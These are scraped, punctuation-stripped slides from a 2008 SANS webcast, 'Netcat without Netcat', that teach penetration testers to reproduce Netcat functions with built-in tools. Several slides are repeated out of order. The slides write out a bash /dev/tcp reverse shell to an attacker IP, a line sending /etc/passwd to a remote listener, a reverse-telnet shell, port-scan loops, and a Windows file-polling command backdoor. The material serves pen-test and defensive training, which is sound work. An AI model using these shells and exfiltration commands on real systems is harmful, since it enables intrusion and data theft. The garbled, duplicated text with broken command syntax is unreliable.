8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 13
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 14
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 15
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
